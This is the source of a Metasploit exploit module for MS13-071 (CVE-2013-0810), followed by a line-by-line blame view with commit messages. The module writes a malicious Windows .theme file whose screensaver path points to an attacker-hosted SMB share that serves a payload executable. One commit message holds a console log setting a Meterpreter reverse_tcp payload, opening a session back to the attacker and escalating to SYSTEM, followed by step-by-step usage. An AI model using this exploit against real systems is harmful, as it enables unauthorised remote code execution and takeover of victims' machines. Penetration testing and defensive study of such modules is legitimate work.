metasploit-framework/modules/exploits/windows/fileformat/ms13_071_theme.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::SMB::Server::Share

  def initialize(info={})
    super(update_info(info,
      'Name'           => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",
      'Description'    => %q{
        This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows
        2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]
        section. An arbitrary path can be used as screen saver, including a remote SMB resource,
        which allows for remote code execution when a malicious .theme file is opened, and the
        "Screen Saver" tab is viewed. The code execution is also triggered if the victim installs
        the malicious theme and stays away from the computer, when Windows tries to display the
        screensaver.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Eduardo Prado', # Vulnerability discovery
          'juan vazquez', # Metasploit module
          'Matthew Hall <hallm@sec-1.com>' # Metasploit module refactored to use Msf::Exploit::Remote::SMB::Server::Share
        ],
      'References'     =>
        [
          ['CVE', '2013-0810'],
          ['MSB', 'MS13-071'],
          ['BID', '62176'],
          ['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040'],
          ['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell']
        ],
      'Payload'        =>
        {
          'Space'       => 2048,
          'DisableNops' => true
        },
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows XP SP3 / Windows 2003 SP2', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Sep 10 2013",
      'DefaultTarget'  => 0))

      register_options(
        [
          OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),
          OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])
        ], self.class)

      deregister_options('FOLDER_NAME')
      deregister_options('FILE_CONTENTS')
  end

  def primer
    self.file_contents = generate_payload_exe
    print_status("Malicious SCR available on #{unc}...")

    # Default Windows XP / 2003 theme modified
    print_status("Creating '#{datastore['FILENAME']}' file ...")
    theme = <<-EOF
; Copyright (c) Microsoft Corp. 1995-2001

[Theme]
DisplayName=@themeui.dll,-2016

; My Computer
[CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon]
DefaultValue=%WinDir%explorer.exe,0

; My Documents
[CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon]
DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0

; My Network Places
[CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon]
DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17

; Recycle Bin
[CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon]
full=%WinDir%SYSTEM32\\shell32.dll,32
empty=%WinDir%SYSTEM32\\shell32.dll,31

[Control Panel\\Desktop]
Wallpaper=
TileWallpaper=0
WallpaperStyle=2
Pattern=
ScreenSaveActive=0

[boot]
SCRNSAVE.EXE=#{unc}

[MasterThemeSelector]
MTSM=DABJDKT
    EOF
    file_create(theme)
  end

end
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`##`

			`require 'msf/core'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`Rank = ExcellentRanking`

			`include Msf::Exploit::FILEFORMAT`
			`include Msf::Exploit::EXE`
Modify SMB generation code to use primer based on #3074 changes to implement Msf::Exploit::Remote::SMB::Server::Share as a mixin. 2015-02-20 11:35:22 +00:00			`include Msf::Exploit::Remote::SMB::Server::Share`
Add module for MS13-071 2013-09-18 18:40:35 +00:00
			`def initialize(info={})`
			`super(update_info(info,`
			`'Name' => "MS13-071 Microsoft Windows Theme File Handling Arbitrary Code Execution",`
			`'Description' => %q{`
			`This module exploits a vulnerability mainly affecting Microsoft Windows XP and Windows`
			`2003. The vulnerability exists in the handling of the Screen Saver path, in the [boot]`
			`section. An arbitrary path can be used as screen saver, including a remote SMB resource,`
			`which allows for remote code execution when a malicious .theme file is opened, and the`
Update descriptions for clarity. 2013-09-23 18:48:23 +00:00			`"Screen Saver" tab is viewed. The code execution is also triggered if the victim installs`
Complete MS13-071 Information 2013-09-22 02:22:34 +00:00			`the malicious theme and stays away from the computer, when Windows tries to display the`
			`screensaver.`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`},`
			`'License' => MSF_LICENSE,`
			`'Author' =>`
			`[`
			`'Eduardo Prado', # Vulnerability discovery`
Refactor ms13_071_theme to utilise `Msf::Exploit::Remote::SMBFileServer` This commit refactors the ms13_071_theme module written by @jvazques-r7 to utilise the Rex SMBFileServer protocol and remove duplicate code from Metasploit. ``` [] Processing test3.msf for ERB directives. resource (test3.msf)> use exploits/windows/fileformat/ms13_071_theme resource (test3.msf)> set VERBOSE true VERBOSE => true resource (test3.msf)> set SHARE share SHARE => share resource (test3.msf)> set SCR exploit.scr SCR => exploit.scr resource (test3.msf)> set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp resource (test3.msf)> set LHOST 172.32.255.1 LHOST => 172.32.255.1 resource (test3.msf)> set SRVHOST 172.32.255.1 SRVHOST => 172.32.255.1 resource (test3.msf)> set LPORT 4444 LPORT => 4444 resource (test3.msf)> exploit [] Started reverse handler on 172.32.255.1:4444 [] Generating our malicious executable... [] Creating 'msf.theme' file ... [+] msf.theme stored at /root/.msf4/local/msf.theme [+] Let your victim open msf.theme [] Starting SMB Server on: \\172.32.255.1\share\exploit.scr [] Starting SMB Server on 172.32.255.1:445 [] Sending stage (769536 bytes) to 172.32.255.129 [] Meterpreter session 1 opened (172.32.255.1:4444 -> 172.32.255.129:1096) at 2014-04-30 12:05:46 +0100 meterpreter > getsystem ...got system (via technique 1). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM ``` 1. use exploits/windows/fileformat/ms13_071_theme 2. set payload windows/meterpreter/reverse_tcp 3. set LHOST 4. set SRVHOST 5. exploit 6. Copy msf.theme to target 7. Open theme and navigate to "Screensaver" tab 8. Enjoy shells - [ ] Land #3074 - [ ] Land #3075 - [ ] Run exploits/windows/fileformat/ms13_071_theme - [ ] Let target open malicious msf.theme file * Windows XP SP3 2014-04-30 11:14:58 +00:00			`'juan vazquez', # Metasploit module`
Do cleanup 2015-03-04 16:33:57 +00:00			`'Matthew Hall <hallm@sec-1.com>' # Metasploit module refactored to use Msf::Exploit::Remote::SMB::Server::Share`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`],`
			`'References' =>`
			`[`
			`['CVE', '2013-0810'],`
			`['MSB', 'MS13-071'],`
Complete MS13-071 Information 2013-09-22 02:22:34 +00:00			`['BID', '62176'],`
Add Metasploit blog references These modules have blogs from the Rapid7 community, we should add them. 2013-10-02 01:50:16 +00:00			`['URL', 'http://www.verisigninc.com/en_US/products-and-services/network-intelligence-availability/idefense/public-vulnerability-reports/articles/index.xhtml?id=1040'],`
			`['URL', 'https://community.rapid7.com/community/metasploit/blog/2013/09/25/change-the-theme-get-a-shell']`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`],`
			`'Payload' =>`
			`{`
			`'Space' => 2048,`
			`'DisableNops' => true`
			`},`
			`'DefaultOptions' =>`
			`{`
remove various module hacks for the datastore defaults not preserving types 2016-03-06 05:11:39 +00:00			`'DisablePayloadHandler' => false`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`},`
			`'Platform' => 'win',`
			`'Targets' =>`
			`[`
			`['Windows XP SP3 / Windows 2003 SP2', {}],`
			`],`
			`'Privileged' => false,`
			`'DisclosureDate' => "Sep 10 2013",`
			`'DefaultTarget' => 0))`
Fix indenting and use primer 2015-03-04 16:46:34 +00:00
			`register_options(`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`[`
Fix indenting and use primer 2015-03-04 16:46:34 +00:00			`OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),`
			`OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`], self.class)`
Fix indenting and use primer 2015-03-04 16:46:34 +00:00
Deregister FOLDER_NAME on exploit modules 2015-03-05 18:27:12 +00:00			`deregister_options('FOLDER_NAME')`
Fix indenting and use primer 2015-03-04 16:46:34 +00:00			`deregister_options('FILE_CONTENTS')`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`end`

Fix indenting and use primer 2015-03-04 16:46:34 +00:00			`def primer`
Modify primer to utilise file_contents macro. 2015-03-04 09:52:00 +00:00			`self.file_contents = generate_payload_exe`
Modify SMB generation code to use primer based on #3074 changes to implement Msf::Exploit::Remote::SMB::Server::Share as a mixin. 2015-02-20 11:35:22 +00:00			`print_status("Malicious SCR available on #{unc}...")`
Do cleanup 2015-03-04 16:33:57 +00:00
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`# Default Windows XP / 2003 theme modified`
Do cleanup 2015-03-04 16:33:57 +00:00			`print_status("Creating '#{datastore['FILENAME']}' file ...")`
Add module for MS13-071 2013-09-18 18:40:35 +00:00			`theme = <<-EOF`
Knock out a Unicode character 2013-09-23 19:22:11 +00:00			`; Copyright (c) Microsoft Corp. 1995-2001`
Add module for MS13-071 2013-09-18 18:40:35 +00:00
			`[Theme]`
			`DisplayName=@themeui.dll,-2016`

			`; My Computer`
			`[CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\DefaultIcon]`
			`DefaultValue=%WinDir%explorer.exe,0`

			`; My Documents`
			`[CLSID\\{450D8FBA-AD25-11D0-98A8-0800361B1103}\\DefaultIcon]`
			`DefaultValue=%WinDir%SYSTEM32\\mydocs.dll,0`

			`; My Network Places`
			`[CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\DefaultIcon]`
			`DefaultValue=%WinDir%SYSTEM32\\shell32.dll,17`

			`; Recycle Bin`
			`[CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\DefaultIcon]`
			`full=%WinDir%SYSTEM32\\shell32.dll,32`
			`empty=%WinDir%SYSTEM32\\shell32.dll,31`

			`[Control Panel\\Desktop]`
			`Wallpaper=`
			`TileWallpaper=0`
			`WallpaperStyle=2`
			`Pattern=`
			`ScreenSaveActive=0`

			`[boot]`
Do cleanup 2015-03-04 16:33:57 +00:00			`SCRNSAVE.EXE=#{unc}`
Add module for MS13-071 2013-09-18 18:40:35 +00:00
			`[MasterThemeSelector]`
			`MTSM=DABJDKT`
			`EOF`
			`file_create(theme)`
			`end`

			`end`